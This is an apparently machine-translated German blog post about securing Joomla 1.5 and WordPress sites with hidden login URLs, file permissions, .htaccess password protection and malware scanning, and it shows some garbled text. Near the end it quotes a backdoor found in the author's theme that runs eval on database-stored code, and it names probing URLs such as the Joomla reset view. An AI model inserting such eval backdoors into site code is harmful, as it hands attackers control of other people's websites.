Ein einfaches, kostenloses und sehr beliebtes Plugin, mit dem Sie die Anmelde-URL des Administrators ändern können.

Nachdem Sie das Plugin installiert und aktiviert haben, müssen Sie zum Admin-Bereich gehen: Einstellungen / Allgemein, scrollen Sie dann ganz nach unten auf der Seite und sehen Sie nur einen Parameter, der von diesem Plugin hinzugefügt wurde:

Standardmäßig schlägt das Plugin die Verwendung des Logins http://yoursite/login vor – dies ist jedoch keineswegs die beste Option! Überlegen Sie sich etwas Eigenes, zum Beispiel: yyy12_go)))

Vergessen Sie nicht, nach dem Ändern dieses Parameters auf die Schaltfläche zu klicken Änderungen speichern– andernfalls haben Sie bei aktivem Plugin einen Login über http://yoursite/login

Versuchen Sie unbedingt, sich vom Admin-Bereich abzumelden und wieder anzumelden, verwenden Sie jedoch eine neue Anmeldeadresse, die Sie sich selbst ausgedacht haben, und vergessen Sie diese vor allem nicht!

Nach dem Ändern des Admin-Einstiegspunkts erhält der Benutzer beim Versuch, auf Standard-URLs zuzugreifen, eine 404-Fehlerseite.

Aufmerksamkeit! Wenn Sie plötzlich die neue Administrator-Anmeldeadresse vergessen, müssen Sie dieses Plugin deaktivieren. Dies kann ohne Aufrufen des Admin-Panels erfolgen, wenn Sie Zugriff auf die Ordner und Dateien der Site haben. Sie müssen lediglich den Plugin-Ordner umbenennen oder löschen wps-hide-login, welches im Ordner sein wird Plugins(Der Plugins-Ordner befindet sich im wp-content-Ordner).

Als Ergebnis: Nach Anwendung aller oben genannten Maßnahmen sollten wir einen Administrator-Login-Schutz mit drei Unbekannten erhalten: E-Mail/Benutzername, ein komplexes Passwort und unsere eigene einzigartige Login-URL – und dies kann die Bemühungen junger Hacker erheblich erschweren)

Hallo, liebe Leser der Blogseite. Heute möchte ich über Arbeitsplatzsicherheit und einige Methoden zum Schutz einer Website vor Hackerangriffen sprechen. Leider bin ich kein Experte auf diesem Gebiet und mein Wissen geht nicht über den Rahmen des Artikels hinaus, aber ich werde einfach meine jüngsten Erfahrungen beschreiben. Ich habe nichts Kompliziertes verwendet, aber ich hoffe, dass dies die Sicherheit bei der Arbeit mit meinen Websites erhöht.

Es geht um Doppelte Authentifizierung, um sich beim Engine-Administrationsbereich anzumelden Ihre Website (sollte auf jedem CMS funktionieren, aber ich persönlich habe es nur auf WordPress und Joomla getestet). Der Schutz wird auf Serverebene installiert, sodass alle Versuche, das Passwort für das Admin-Panel zu erraten (Brute Force), keine erhöhte Belastung für das Hosting darstellen und es ziemlich schwierig ist, es zu umgehen. Die Installation ist einfach (im wahrsten Sinne des Wortes in wenigen Schritten) und von all den Kenntnissen erfordert es nur Aufmerksamkeit und die Fähigkeit, über FTP auf die Website zuzugreifen.

Nun, ich werde auch ein paar Aktionen nennen, die ich auf Websites mit bereits veralteten Joomla 1.5-Engines angewendet habe, bei denen es für mich keinen Sinn macht, sie zu übertragen, die aber ständig meinen Server beschädigen und den Server zum Versenden von Spam verwenden. Ich habe die beschriebenen Maßnahmen kürzlich durchgeführt, daher kann ich nicht sagen, dass die Websites nicht mehr mit Viren infiziert sind, aber ich hoffe es. Im Allgemeinen habe ich ein wenig versucht Erhöhen Sie die Rissbeständigkeit von Joomla 1.5.

So schützen Sie Joomla 1.5 vor Hacking und Viren

Wie ich oben erwähnt habe, besteht das Problem darin, dass zwei meiner Websites, auf denen Joomla 1.5 läuft, ständig gehackt werden. Wir können sie als aufgegeben betrachten, da ich ihnen keine neuen Materialien hinzufüge, sie aber regelmäßig Einnahmen generieren (durch die Veröffentlichung von Artikeln von Miralinks und Webartex sowie Links von Gogetlinks). Im Allgemeinen ist es schade, sie wegzuwerfen, und sie auf eine neue Version der Engine zu übertragen, ist Verschwendung (Zeit- und Arbeitsverschwendung).

Es bleibt nur noch, entweder die Auslastung des Servers ständig zu überwachen und bei zunehmender Belastung in den Engine-Dateien nach Shells und anderer Malware zu suchen oder den Schutz irgendwie zu verstärken. Um nach Malware zu suchen, lade ich die Engine-Dateien auf meinen Computer herunter und scanne sie mit DoctorWeb und Aibolit. Ersteres findet nicht alles, und letzteres sieht den Feind zu oft dort, wo keiner ist, aber andere wirksame Methoden kenne ich nicht. Es gibt zwar auch Dutzende Programme, aber das ist für jeden bequemer.

Übrigens, das Drehbuch Aibolit kann nicht nur auf dem Server, sondern auch direkt auf dem Computer im Ordner mit den heruntergeladenen Engine-Dateien funktionieren (vergessen Sie nur nicht, das Standard-Antivirenprogramm beim Herunterladen der Site zu deaktivieren, da dadurch möglicherweise einige der Dateien gelöscht werden, diese aber trotzdem gelöscht werden bleiben auf dem Server).

Detaillierte Anweisungen finden Sie im Video unten, aber kurz gesagt: Sie laden den PHP-Sprachinterpreter von der Microsoft-Website herunter und installieren ihn. Anschließend öffnen Sie die Aibolit-Skriptdatei namens ai-bolit.php mit genau diesem Interpreter:

Die Scangeschwindigkeit hängt von der Geschwindigkeit Ihres Computers und der Anzahl der Dateien in Ihrer Website-Engine ab. Für die https://-Seite habe ich mehrere Stunden gebraucht, weil Aibolit sogar Bilder vermutet, die Viren verstecken, und ich habe eine Menge genau dieser Bilder, und die Cache-Dateien nehmen beim Scannen viel Zeit in Anspruch. Bei Websites mit Joomla 1.5 war die Überprüfung viel schneller.

Ich beschloss, einen Tag damit zu verbringen, nach Möglichkeiten zu suchen, die Website-Sicherheit zu verbessern. Wir haben sehr wenig geschafft, aber immer noch besser als nichts. Lass uns beginnen mit Stärkung des Schutzes (und Reduzierung von Schwachstellen) von zwei Websites auf Joomla 1.5. Folgendes wurde gemacht:


Wie kann man Joomla 1.5 sonst noch vor Viren und Streaming-Hacks schützen?

  1. Außerdem behaupten „Experten“, dass Websites auf Joomla 1.5 „ein- oder zweimal“ beschädigt werden, wenn das in der Engine verfügbare verwendet wird (angeblich kann man damit das Administratorkennwort ändern). Auch wenn Sie auf Ihrer Website keine Registrierung nutzen und nirgendwo einen Wiederherstellungslink anzeigen, bedeutet das nicht, dass Sie diese Sicherheitslücke abgedeckt haben. Fügen Sie einfach den folgenden Snippet zur URL der Homepage Ihrer Website hinzu und erhalten Sie die gesuchte Funktion: /index.php?option=com_user&view=reset

    Um diese Lücke zu schließen (aber ich verstehe immer noch nicht, wie man sie zum Hacken nutzt), können Sie einfach die folgende Datei löschen:

    /components/com_user/models/reset.php Zwar kann danach keiner der auf Ihrer Website registrierten Benutzer die Funktion zur Passwortwiederherstellung nutzen, aber für mich war das nicht wichtig, da keine Registrierung vorgesehen war.

  2. Sie sagen auch, dass solch ein nützlicher Trick, wie das Hinzufügen der Seitenadresse, es auch Virenschreibern und Jägern des Eigentums anderer Leute ermöglicht, an einige sensible Bereiche Ihrer Website zu gelangen und sie destruktiv zu machen oder ihn auf andere Weise zu missbrauchen. Dieses Ding wird durch Bearbeiten einer der Engine-Dateien wieder entfernt. /libraries/Joomla/application/module/helper.php

    Dort müssen Sie zwei Codeteile entfernen oder sie auskommentieren und sie in /* und */ einschließen (dieser Code wird vom Sprachinterpreter nicht ausgeführt). Das erste Fragment sieht so aus:

    If(count($result) == 0) ( if(JRequest::getBool("tp")) ( $result = JModuleHelper::getModule("mod_".$position); $result->title = $position; $result->content = $position; $result->position = $position;

    Und das zweite ist so:

    If(JRequest::getBool("tp")) ( $attribs["style"] .= " outline"; )

    Tatsächlich setzen Sie danach den Cache zurück und versuchen, die Positionen der Module in Ihrer Vorlage mithilfe dieser Konstruktion anzuzeigen:

    Https://site/?tp=1

    Wenn es nicht geklappt hat, haben Sie diese Lücke hoffentlich geschlossen.

  3. Sehr oft werden Websites nicht von außen, sondern von innen gehackt. Trojaner und Keygens auf Ihrem Computer wissen also, was und wo sie suchen müssen Speichern Sie keine Passwörter in FTP-Clients(Zu diesem Zweck gibt es eine Option.) Es wird als noch cooler angesehen, die Möglichkeit des Zugriffs auf Ihre Website über FTP zu deaktivieren und stattdessen die übertragenen Informationen (einschließlich Passwörter) zu verschlüsseln, was das Abfangen nutzlos macht. Ehrlich gesagt vernachlässige ich den letzten Rat aufgrund meiner „Dunkelheit“. Es besteht auch die Möglichkeit, den Zugriff auf Ihre Website über normales FTP nur von einer bestimmten IP-Adresse (Ihrem Computer) aus einzurichten, mein Internetprovider hat jedoch eine dynamische IP (ändert sich innerhalb eines bestimmten Bereichs).
  4. Auch beraten Motor nicht höher sein, als für den Betrieb tatsächlich erforderlich ist. Tatsächlich habe ich, ohne wirklich darüber nachzudenken, es gemäß der Vorlage eingestellt: 755 für Ordner und 644 für Dateien. Sie können alles mit demselben Filezilla erledigen. Darüber hinaus müssen diese Rechte nicht nur auf die Verzeichnisse des Stammordners angewendet werden, sondern auch auf alle darin enthaltenen Verzeichnisse und Dateien.

    Ich habe die Berechtigungen für die Dateien im Stammordner auf 444 und für die Verzeichnisse tmp und logs auf 705 festgelegt. Natürlich hätte ich es strenger festlegen können, aber ich habe nicht viel Erfahrung damit und ich hatte keine Zeit Zeit mit Experimenten verschwenden. Und außerdem wird all dies Hacker nicht wirklich abschrecken, denn es gibt Dinge, die alle unsere Bemühungen zunichte machen können. Verwenden Sie dazu Befehle wie diesen:

    Um die Dateien der Joomla 1.5-Engine vollständig vor Hacking und Eingriffen zu „konkretieren“, ist es daher notwendig, die Änderung der Zugriffsrechte auf Dateien und Ordner über PHP zu verbieten. Dies geschieht in den Servereinstellungen, allerdings weiß ich noch nicht wie und wo. Wenn Sie es wissen, posten Sie bitte einen Link.

  5. All dies dient dazu, die Wahrscheinlichkeit zu verringern, dass Ihre Website gehackt wird und von Shells und anderer Malware infiltriert wird. Allerdings stellen die getroffenen Vorsichtsmaßnahmen keine Garantie dar, daher wäre es auf dem Server (auf dem sich Ihre Joomla 1.5-Site befindet) großartig. Dadurch wird die gesamte Negativität des durchgesickerten Übels entfernt. Ich persönlich habe dies jedoch wiederum aus Gründen meiner „Dunkelheit“ noch nicht umgesetzt. Für Links zu Materialien, die diesen Prozess erläutern, wäre ich dankbar.

    6. Sehr oft gehen Websites kaputt, nachdem sie sich Zugang zum Verwaltungsbereich verschafft haben. Es ist klar, dass es passwortgeschützt ist, sodass viele selbst scheinbar komplexe Passwörter mit roher Gewalt (intelligentes Raten) in ein oder zwei Sekunden geknackt werden können. Deshalb Auch das Admin-Panel muss geschützt werden, und es ist besser, dies nicht mit zusätzlichen Erweiterungen, sondern mit Server-Tools zu tun. Es gibt mehrere Schutzmöglichkeiten. Sie können beispielsweise die URL des Admin-Panels auf die eine oder andere Weise ändern, damit ein Hacker sein schmutziges Geschäft nicht starten kann.

    Eine weitere Schutzmethode, die im Folgenden ausführlich beschrieben wird, besteht darin, eine zusätzliche Barriere im Weg eines Angreifers (einer lebenden Person oder eines Skripts) zu schaffen. Es besteht darin, das Verzeichnis mit Admin-Dateien (in Joomla ist dies der Administratorordner und in WordPress – wp-admin) über den Webserver mit einem Passwort zu schützen. Es stellt sich heraus, dass Sie beim Zugriff auf das Admin-Panel zunächst den Benutzernamen und das Passwort eingeben müssen, um auf den Ordner zuzugreifen, und erst dann den Benutzernamen und das Passwort, um tatsächlich auf das Admin-Panel der Engine zuzugreifen. Darüber hinaus verursacht die Malware durch das Durchbrechen der ersten Verteidigungslinie mithilfe von Brute-Force-Methoden keine nennenswerte zusätzliche Belastung des Servers, was gut ist.

  6. Ein weiterer meiner Meinung nach sehr wichtiger Hinweis zur Erhöhung der Sicherheit Ihrer Websites vor Hacking und Virenbefall ist die Befolgung der Regel: Eine Site – ein Hosting-Konto. Ja, es ist teurer, aber viel sicherer. Beim Hosten auf einem Konto sind alle Ihre Websites sofort über FTP zugänglich, wenn die Malware nur auf eine davon Zugriff erhält. Sie zerstören Websites automatisch und es wäre nicht sinnvoll zu hoffen, dass die Skripte nicht im Verzeichnisbaum nach oben gelangen. Darüber hinaus ist es sehr schwierig, eine Reihe von Websites auf einem Hosting-Konto zu behandeln, da Sie durch die Arbeit an einer Website die bereits geheilte Website aus den Augen verlieren, die gleichzeitig infiziert wird.
  7. Übrigens können sie nicht nur von Ihrer eigenen Site, sondern auch von der Site Ihres Hosting-Nachbarn beschädigt werden, wenn die Eigentümer nicht sorgfältig darauf geachtet haben, diese Möglichkeit auszuschließen. Das Hosting-Panel (z. B.) kann ebenfalls gehackt werden, aber in jedem Fall ist die Anzahl der Hacks, die auf das Verschulden des Hosters zurückzuführen sind, im Vergleich zu der Anzahl der Hacks, die auf die Nachlässigkeit der Websitebesitzer zurückzuführen sind, vernachlässigbar.

Wie schützen Sie den Admin-Bereich Ihrer Website vor Hackern?

Ich möchte ausführlich über die Schutzmethode sprechen, die ich kürzlich selbst verwendet habe. Es besteht darin Verbieten des Zugriffs auf Ordner, in denen sich die Dateien des Verwaltungsbereichs der Site befinden. Das Verbot wird mithilfe einer wunderbaren .htaccess-Datei festgelegt, die es Ihnen im Wesentlichen ermöglicht, die Einstellungen des Webservers, auf dem Ihre Site installiert ist, fernzusteuern. Gleichzeitig versteht er es, dies gezielt zu tun.

Alle in .htaccess geschriebenen Anweisungen gelten nur für das Verzeichnis, in dem sie sich befinden. Möchten Sie etwas an den Einstellungen für die gesamte Website ändern? Platzieren Sie dann .htaccess im Stammordner. Nun, uns interessieren nur die Einstellungen bezüglich des Ordners mit den Admin-Dateien, also werden wir ihn dort platzieren. In Joomla ist dies der Administratorordner, in WordPress – wp-admin.

Allerdings kommen wir mit .htaccess allein nicht aus. Sie müssen auch .htpasswd verwenden, wo der Benutzername und das Passwort für den Zugriff auf diesen Verwaltungsordner gespeichert werden. Darüber hinaus wird das Passwort nicht im Klartext, sondern als MD5-Verschlüsselung gespeichert. Es ist nicht möglich, das Passwort damit wiederherzustellen, aber wenn Sie die richtige Kombination in das Passwortfeld eingeben, berechnet der Webserver den MD5-Betrag für diese Kombination und vergleicht ihn mit dem, was in .htpasswd gespeichert ist. Wenn die Daten übereinstimmen, erhalten Sie Zutritt zum Joomla- oder WordPress-Administrationsbereich, andernfalls jedoch nicht.

Das ist alles, es bleibt nur noch, den Plan in die Tat umzusetzen. Sie müssen einige Anweisungen zu .htaccess hinzufügen. Wissen Sie welche? Ich weiß nicht. Und irgendwie müssen Sie das Passwort in eine MD5-Sequenz umwandeln. Problem. Es gibt jedoch eine ziemlich einfache Lösung. Gute Leute haben einen Onlinedienst zum Generieren von Inhalten für die .htaccess-Datei und die .htpasswd-Datei basierend auf dem von Ihnen erstellten Benutzernamen und Passwort organisiert. Zwar müssen Sie auch den absoluten Pfad zum Verwaltungsordner angeben, aber das ist trivial.

Treffen Sie also die Großen und Schrecklichen Schutzgenerator für das Admin-Panel Ihrer Site. Ich verstehe, oder? Sie erfinden oder erstellen zwei komplexe Kombinationen aus Buchstaben, Zahlen und Symbolen auf etwas und geben diese dann in die beiden oberen Felder ein. Vergessen Sie aber nicht, sie aufzuschreiben oder in einen Passwort-Manager einzugeben, sonst können Sie sich nicht in den Admin-Bereich einloggen und müssen alles, was in diesem Teil beschrieben wird, von vorne beginnen.

Jetzt hier. Kennst du das hier? Auch wenn Sie es nicht wissen, spielt es keine Rolle. Stellen Sie über FTP eine Verbindung zur Site her, erstellen Sie im Stammverzeichnis eine Datei mit einem beliebigen Namen (sogar mit der folgenden url_path.php) und fügen Sie diesen einfachen Code hinzu:

"; echo "Vollständiger Pfad zum Skript und sein Name: „.$_SERVER[“SCRIPT_FILENAME“].“
"; echo "Skriptname: ".$_SERVER["SCRIPT_NAME"]; ?>

Gehen Sie dann zum Browser und geben Sie diese URL in die Adressleiste ein (natürlich mit Ihrer Domain):

Https://site/url_path.php

Als Ergebnis sehen Sie den absoluten Pfad, der Sie interessiert hat. Geben Sie es in den oben genannten .htaccess- und .htpasswd-Dateigenerator ein. Vergessen Sie nicht, am Ende dieses Pfads den Namen des Administrator- oder wp-admin-Ordners ohne den abschließenden Schrägstrich hinzuzufügen. Klicken Sie nun auf die Schaltfläche „Generieren“.

Und übertragen Sie die Inhalte der Dateien .htaccess und .htpasswd nacheinander direkt in dieselben Dateien.

Ich hoffe, dass Sie sie bereits im Administrator- oder wp-admin-Ordner erstellt haben (abhängig von der von Ihnen verwendeten Engine)?

Versuchen Sie nun, sich im Admin-Bereich anzumelden. Erscheint ein Fenster, in dem Sie aufgefordert werden, Ihren Webserver-Benutzernamen und Ihr Passwort einzugeben? Es wird in verschiedenen Browsern unterschiedlich gerendert, aber in Chrome sieht es so aus:

Wenn etwas nicht funktioniert, „smoken“ Sie den absoluten Pfad zu .htpasswd, der in der .htaccess-Datei geschrieben ist. Korrigieren Sie es in diesem Fall einfach manuell beim Bearbeiten der Datei. Das ist alles, was ich dir heute sagen wollte. Wenn Sie etwas kritisieren oder hinzufügen möchten, dann machen Sie weiter.

Virus in WordPress?

Nachdem ich diesen Artikel geschrieben hatte, entdeckte ich auf meinem Blog (https://site) Malware (oder etwas, das unter Umgehung meines Willens installiert wurde). Ich wollte einfach etwas am Code ändern und bin in . Ganz unten, unmittelbar vor dem Body-Tag, fiel mir ein Aufruf einer Funktion auf, die mir unbekannt war (aufgrund des Namens, aber ich habe nichts Nützliches gefunden):

Der Name scheint vernünftig zu sein. Es ist bemerkenswert, dass ich etwa drei Wochen zuvor zufällig entdeckte, dass ich in den Datenbanken von zwei meiner WordPress-Blogs (https://site und einem anderen) eine neue Tabelle hatte. Sein Name war einfach wunderbar – wp-config. Das erneute Googeln dieses Namens ergab nichts Nützliches, da sich alle Antworten auf die gleichnamige Datei wp-config.php bezogen.

Diese Tabelle wuchs schnell an Größe (bis zu hundert Megabyte auf https://site) und die Adressen der Seiten meiner Site mit verschiedenen Parametern wurden darin geschrieben. Da ich die Essenz dieses Prozesses nicht verstand, habe ich diesen Tisch einfach demoliert und das war's. Ich habe übrigens einen anderen Blog auf WordPress, aber dort wurde nichts dergleichen beobachtet.

Nun, hier habe ich so eine „sprechende“ Einfügung in das Thema gefunden. Ich beschloss zu prüfen, ob dort etwas hinzugefügt wurde, das mit der oben beschriebenen Zeile unten in der Fußzeile übereinstimmt. Es stellte sich heraus, dass es hinzugefügt wurde. Und so ordentlich – weder ganz oben noch ganz unten, sondern die zweite (oder dritte) Funktion von oben eingeschrieben:

Funktion wp_custom_page_links_return() ( $option = get_option("wp_custom_page_links"); @eval($option); ) @eval(get_option("wp_brlinks"));

Hier fällt Ihnen das wunderbare „eval“ ins Auge. Bemerkenswert ist, dass Aibolit (oben beschrieben) dieses Fragment verdächtig fand, aber ich bin noch nicht dazu gekommen, weil dieses Skript bereits viele Leute der Unzuverlässigkeit verdächtigt. Ich habe auch nach diesem Code gegoogelt und einen Beitrag gefunden (leider wurde diese Domain jetzt wegen Nichtzahlung gesperrt), der ein ähnliches Problem beschreibt. Ein Freund von mir hat diesen Mist mit einem neuen Theme durchsickern lassen, in das etwas Installationscode eingebettet war.

Ich habe seit vielen Jahren Themen auf beiden infizierten Blogs. Es gab wahrscheinlich eine Art Schwachstelle in der Engine oder , die schnell (im laufenden Betrieb) von Ungläubigen ausgenutzt wurde. Überprüfen Sie im Allgemeinen selbst, ob solche Einschlüsse nicht vorhanden sind. Das Datum der Änderung der beschriebenen Dateien war meiner Meinung nach Mitte September dieses Jahres.

Ich empfehle Ihnen auch, sich eine Auswahl von anzusehen 17 Video-Lektionen zum Sichern von Websites auf Joomla. Sie werden automatisch nacheinander abgespielt, und wenn Sie möchten, können Sie über die entsprechende Schaltfläche im Player-Panel zur nächsten Lektion wechseln oder die gewünschte Lektion aus dem Dropdown-Menü in der oberen linken Ecke des Player-Fensters auswählen:

Genieße das Zusehen!

Viel Erfolg! Bis bald auf den Seiten der Blog-Site

Du könntest interessiert sein

Die Joomla-Site begann eine Reihe von Fehlern zu erzeugen, wie z. B. – Strenge Standards: Nicht-statische Methode JLoader::import () sollte nicht statisch aufgerufen werden
Joomla auf die neueste Version aktualisieren
Erstellen einer Karte für eine Joomla-Site mithilfe der Xmap-Komponente
Was ist Joomla
Benutzergruppen in Joomla, Caching-Einstellungen und das Problem beim Versenden von E-Mails von der Site
K2-Komponente zum Erstellen von Blogs, Katalogen und Portalen auf Joomla – Funktionen, Installation und Russifizierung
Module in Joomla – Position, Einstellung und Ausgabe anzeigen sowie Klassensuffixe zuweisen
So aktualisieren Sie eine statische HTML-Site in eine dynamische auf Joomla
Installation von WordPress in Details und Bildern, Anmeldung im WP-Adminbereich und Änderung des Passworts
Joomla-Plugins – TinyMCE, Load Module, Legacy und andere standardmäßig installiert



IN VERBINDUNG STEHENDE ARTIKEL